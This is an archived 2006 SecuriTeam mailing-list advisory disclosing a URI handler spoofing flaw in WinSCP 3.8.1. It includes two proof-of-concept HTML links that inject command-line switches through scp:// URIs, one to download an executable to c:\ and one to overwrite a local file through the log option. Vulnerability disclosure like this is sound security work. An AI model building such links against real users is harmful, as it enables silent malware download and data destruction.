[NT] WinSCP - URI Handler Spoofing
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 14 Jun 2006 14:08:06 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WinSCP - URI Handler Spoofing
------------------------------------------------------------------------
SUMMARY
" <http://winscp.net/> WinSCP is an open source freeware SFTP client for
Windows using SSH. "
Improper handling of a URI allows attackers to upload, download and
execute arbitrary files without user intervention.
DETAILS
Vulnerable Systems:
* WinSCP version 3.8.1
During a typical installation of winscp several URI handlers are installed
(scp:// sftp://). It is possible to include additional command line
switches to be passed to winscp
Some of these switches may initiate a file transfer, sending a specified
file to an arbitrary ftp. or they may download executables to a location
on a pc where they would be executed. eg. the startup folder
Attackers can create and html page with the content of:
<a
href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
When a user will click on the link it would automatically download
malware.exe to a c:\ (assuming the host is in the cache otherwise user
interaction is required).
By clicking on
<a href="scp://jelmer@xxxxxxxxx:22/%22%20%22/log=c:%5csomefile%22"log</a>
would append log output to c:\somefile possibly rendering the file
unusable in the process.
Note that this also works when the host is not in the cache
ADDITIONAL INFORMATION
The information has been provided by <mailto:jkuperus@xxxxxxxxx> Jelmer
Kuperus.
The original article can be found at:
<http://www.frsirt.com/english/reference/13286>
http://www.frsirt.com/english/reference/13286
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] John The Ripper MPI Patch
- Next by Date: [NT] Vulnerability in Windows Media Player Could Allow Remote Code Execution (MS06-024)
- Previous by thread: [TOOL] John The Ripper MPI Patch
- Next by thread: [NT] Vulnerability in Windows Media Player Could Allow Remote Code Execution (MS06-024)
- Index(es):
Relevant Pages
|
|
